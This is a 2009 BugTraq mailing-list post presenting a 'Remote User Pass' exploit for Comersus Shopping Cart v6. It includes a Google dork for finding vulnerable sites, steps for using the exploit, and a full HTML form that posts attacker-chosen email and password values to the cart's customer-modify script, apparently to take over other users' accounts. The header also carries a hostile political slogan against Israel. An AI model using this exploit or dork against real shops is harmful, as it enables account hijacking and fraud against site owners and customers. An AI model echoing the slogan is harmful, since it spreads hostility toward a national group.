Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Comersus Shopping Cart <= v6 Remote User Pass Exploit Jan 12 2009 12:47PM
ajannhwt hotmail com
************************************************************************
*******

# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit

# Author : "ajann" from Turkey

# Contact : :(

# S.Page : http://www.comersus.com/

# $$ : Free

# Dork : Powered by Comersus v6 Shopping Cart

# DorkEx :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+
Cart&btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site

-Login

-Open Exploit

-Edit: User Email , User Password

-Submit Form

************************************************************************
*******

<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">

<table width="421" border="0">

<tr>

</tr>

<tr>

<td width="168">Name</td>

<td width="220">

<input type=text name=customerName value="test">

</td>

</tr>

<tr>

<td width="168">Last Name</td>

<td width="220">

<input type=text name=lastName value="test">

</td>

</tr>

<tr>

<td width="168">Company</td>

<td width="220">

<input type=text name=customerCompany value="test">

</td>

</tr>

<tr>

<td width="168">Phone</td>

<td width="220">

<input type=text name=phone value="123456789">

</td>

</tr>

<tr>

<td width="168"><strong>Email</strong></td>

<td width="220">

<input type="text" name="email" value="Please Add Mail">

Edit

</td>

</tr>

<tr>

<td width="168"><strong>Password</strong></td>

<td width="220">

<input type=text name=password value="Please Add Pass">

Edit

</td>

</tr>

<tr>

<td width="168">Address</td>

<td width="220">

<input type=text name=address value="test">

</td>

</tr>

<tr>

<td width="168">Zip</td>

<td width="220">

<input type=text name=zip value="08050">

</td>

</tr>

<tr>

<td width="168">State</td>

<td width="220">

<SELECT name=stateCode size=1>

<OPTION value="">Select the state

<option value="1">Please Type County below

</OPTION>

</SELECT>

</td>

</tr>

<tr>

<td width="168">Non listed state</td>

<td width="220">

<input type=text name=state value="">

</td>

</tr>

<tr>

<td width="168">City</td>

<td width="220">

<input type=text name=city value="test">

</td>

</tr>

<tr>

<td width="168">Country</td>

<td width="220">

<SELECT name=countryCode>

<OPTION value="">Select the country

<option value="AF" selected>AFGHANISTAN

</OPTION>

</SELECT>

</td>

</tr>

<tr>

<td width="168"> </td>

<td width="220"> </td>

</tr>

<tr>

<td colspan="2">

<input type="submit" name="Modify" value="Modify">

</td>

</tr>

</table>

</form>

[ reply ]




 

Privacy Statement
Copyright 2008, SecurityFocus